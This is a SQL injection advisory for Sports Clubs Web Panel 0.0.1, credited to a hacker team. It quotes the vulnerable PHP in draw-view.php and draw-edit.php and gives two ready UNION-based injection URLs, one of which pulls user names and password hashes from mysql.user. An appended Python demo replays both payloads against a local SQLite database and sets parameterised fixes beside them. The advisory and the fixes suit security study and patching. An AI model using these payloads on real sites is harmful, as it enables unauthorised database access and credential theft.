###################################################################################
#                                                                                 #
#    ...::::: Sports Clubs Web Panel 0.0.1 SQL Injection Vulnerability ::::....   #
#                                                                                 #
###################################################################################

Virangar Security Team
www.virangar.net

--------
Discovered by: virangar security team (Zahra: zh_virangar)
Special thanks: my master hadihadi
Thanks to: MR.nosrati, black.shadowes, MR.hesy, Ali007 & all virangar members & all hackerz

-------
Vulnerable code in /include/draw-view.php:

line 22: if(isset($_GET['id']) || isset($_POST['id'])) {
line 23:     $teamid = $_GET['id'].$_POST['id'];
...
...
line 43: $drawTeam = mysql_query("SELECT * FROM draw WHERE dteam = '$teamid' ORDER BY ddate");

The id value is taken from GET or POST (line 23 simply concatenates the two) and interpolated, without escaping or type checking, inside the single-quoted literal of the query on line 43.

----------
Vulnerable code in /include/draw-edit.php:

line 1: $id = $_GET['id'];
line 2: $editDraw = mysql_query("SELECT * FROM draw WHERE did='$id' LIMIT 1");

The same pattern: id goes straight from the request into the quoted literal.

--------
Exploit:

http://site.com/[path]/?p=draw-view&id='/**/union/**/select/**/1,2,3,version(),5,6,User,password%20,9/**/from/**/mysql.user/*

http://site.com/[path]/?p=draw-edit&id='/**/union/**/select/**/1,2,3,4,5,version(),7,8,9/*

The leading ' closes the string literal, the UNION SELECT supplies nine columns to match the column count of SELECT * FROM draw, and the trailing /* turns the rest of the original query (the ORDER BY or LIMIT clause and the closing quote) into a comment. The /**/ sequences are empty comments used in place of spaces. The first request reads user names and password hashes from mysql.user; this only succeeds when the database account used by the application has been granted SELECT on the mysql database, otherwise only version() and the marker columns come back.

-------------
young iranian h4ck3rz
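The following is an added example, not code from the advisory or from Sports Clubs Web Panel, that reproduces both injections against a local SQLite database so the mechanics can be checked offline. It assumes a nine-column draw table (matching the nine positions in the published payload), a hypothetical users table standing in for mysql.user, and sqlite_version() in place of MySQL's version(); the vulnerable function builds its query exactly the way line 43 of draw-view.php does, and the hardened function binds the value as a parameter instead.

```python
import sqlite3

# Constructed sample schema and rows, not taken from the advisory. The draw
# table has nine columns so that a nine-column UNION lines up with it; the
# hypothetical users table plays the role of mysql.user.
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE draw (did INTEGER, dteam TEXT, c3 TEXT, c4 TEXT,
                           c5 TEXT, c6 TEXT, c7 TEXT, c8 TEXT, ddate TEXT);
        INSERT INTO draw VALUES (1, '7', 'a', 'b', 'c', 'd', 'e', 'f', '2008-01-01');
        CREATE TABLE users (User TEXT, password TEXT);
        INSERT INTO users VALUES ('root', '*E6CC90B878B948C35E92B003C792C46C58C4AF40');
    """)
    return conn


def draw_view_vulnerable(conn, get_id="", post_id=""):
    # Mirrors lines 23 and 43 of draw-view.php: GET and POST values are
    # concatenated and dropped into the quoted literal unescaped.
    team_id = get_id + post_id
    sql = "SELECT * FROM draw WHERE dteam = '%s' ORDER BY ddate" % team_id
    return conn.execute(sql).fetchall()


def draw_edit_vulnerable(conn, did):
    # Mirrors lines 1 and 2 of draw-edit.php.
    sql = "SELECT * FROM draw WHERE did='%s' LIMIT 1" % did
    return conn.execute(sql).fetchall()


def draw_view_fixed(conn, team_id):
    # Hardened form: the value is bound by the driver and never parsed as
    # SQL, so quotes, comments and UNION in it are just characters.
    sql = "SELECT * FROM draw WHERE dteam = ? ORDER BY ddate"
    return conn.execute(sql, (team_id,)).fetchall()


def draw_edit_fixed(conn, did):
    # did is an integer key; reject anything that is not one before querying.
    sql = "SELECT * FROM draw WHERE did=? LIMIT 1"
    return conn.execute(sql, (int(did),)).fetchall()


# The advisory's payloads with MySQL-specific names swapped for SQLite ones
# (users for mysql.user, sqlite_version() for version()); %20 decoded to a space.
VIEW_PAYLOAD = ("'/**/union/**/select/**/1,2,3,sqlite_version(),5,6,User,password ,9"
                "/**/from/**/users/*")
EDIT_PAYLOAD = "'/**/union/**/select/**/1,2,3,4,5,sqlite_version(),7,8,9/*"


def run_demo():
    conn = build_db()
    leaked = draw_view_vulnerable(conn, get_id=VIEW_PAYLOAD)
    version_row = draw_edit_vulnerable(conn, EDIT_PAYLOAD)
    return {
        # Row injected via UNION: columns 7 and 8 carry User and password.
        "leaked_user": leaked[0][6],
        "leaked_hash": leaked[0][7],
        # version() lands in column 6 of the draw-edit payload.
        "edit_version_col": version_row[0][5],
        # The same payloads do nothing against the parameterised queries.
        "fixed_view_rows": len(draw_view_fixed(conn, VIEW_PAYLOAD)),
        "fixed_edit_rejected": _rejects(lambda: draw_edit_fixed(conn, EDIT_PAYLOAD)),
        "fixed_view_legit_rows": len(draw_view_fixed(conn, "7")),
    }


def _rejects(fn):
    try:
        fn()
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```

The trailing /* is accepted by both MySQL and SQLite as a comment that runs to end of input, which is why the original ORDER BY and LIMIT clauses never reach the parser. In the PHP of the affected version the equivalent of the hardened functions is casting numeric ids with intval() and, for strings, binding through mysqli or PDO prepared statements rather than interpolating into the query text.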